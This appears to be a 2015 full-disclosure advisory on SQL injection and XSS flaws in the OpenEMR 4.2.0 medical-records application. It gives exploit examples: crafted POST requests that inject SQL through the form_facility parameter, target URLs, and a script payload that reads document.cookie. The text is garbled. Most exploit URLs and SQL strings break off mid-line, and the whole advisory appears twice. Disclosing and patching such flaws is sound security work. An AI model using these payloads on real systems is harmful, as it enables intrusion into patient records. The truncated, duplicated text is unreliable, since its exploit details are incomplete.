Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in
openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list
==========================
Vulnerability Description:
==========================
Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.
==================
Technical Details:
==================
All below described vulnerabilities can only be exploited by an already
authenticated user.
=====================
SQL injection vulnerabilities
=====================
An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.
Exploit-Example:
http://
{TARGET}/interface/usergroup/
Another (blind) SQL injection vulnerability resides in the
appt_encounter_report.php an can be abused by an attacker by modifying a
the form_facility-parameter in a POST-request.
Exploit-Example:
POST /openemr-4.2.0/interface/
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.
Cookie: OpenEMR=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 120
form_facility=3%27+AND+
The last (blind) SQL injection vulnerability resides in the
appointments_report.php-file and can be as well abused by an attacker via
crafting own SQL statements in the form_facility-parameter in a POST
request.
Exploit-Example:
POST /openemr-4.2.0/interface/
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.
Cookie: OpenEMR=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 199
form_facility=3%27+and+
==============
XSS vulnerabilities
==============
A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.
Exploit-Example:
http://
{TARGET}interface/usergroup/
A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.
Exploit-Example:
<script>alert(document.cookie)
=========
Solution:
=========
Install the latest patch (released 21st March 2015, see [3]).
====================
Disclosure Timeline:
====================
12/13-Jan-2015 – found the vulnerability
13-Jan-2015 - informed the developers
13-Jan-2015 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been
released
21-Mar-2015 – release date of the patch
22-Mar-2015 – release date of this security advisory
22-Mar-2015 – send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/
[3] http://www.open-emr.org/wiki/
openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list
==========================
Vulnerability Description:
==========================
Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.
==================
Technical Details:
==================
All below described vulnerabilities can only be exploited by an already
authenticated user.
=====================
SQL injection vulnerabilities
=====================
An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.
Exploit-Example:
http://
{TARGET}/interface/usergroup/
Another (blind) SQL injection vulnerability resides in the
appt_encounter_report.php an can be abused by an attacker by modifying a
the form_facility-parameter in a POST-request.
Exploit-Example:
POST /openemr-4.2.0/interface/
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.
Cookie: OpenEMR=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 120
form_facility=3%27+AND+
The last (blind) SQL injection vulnerability resides in the
appointments_report.php-file and can be as well abused by an attacker via
crafting own SQL statements in the form_facility-parameter in a POST
request.
Exploit-Example:
POST /openemr-4.2.0/interface/
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/openemr-4.2.
Cookie: OpenEMR=
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 199
form_facility=3%27+and+
==============
XSS vulnerabilities
==============
A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.
Exploit-Example:
http://
{TARGET}interface/usergroup/
A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.
Exploit-Example:
<script>alert(document.cookie)
=========
Solution:
=========
Install the latest patch (released 21st March 2015, see [3]).
====================
Disclosure Timeline:
====================
12/13-Jan-2015 – found the vulnerability
13-Jan-2015 - informed the developers
13-Jan-2015 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been
released
21-Mar-2015 – release date of the patch
22-Mar-2015 – release date of this security advisory
22-Mar-2015 – send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/
[3] http://www.open-emr.org/wiki/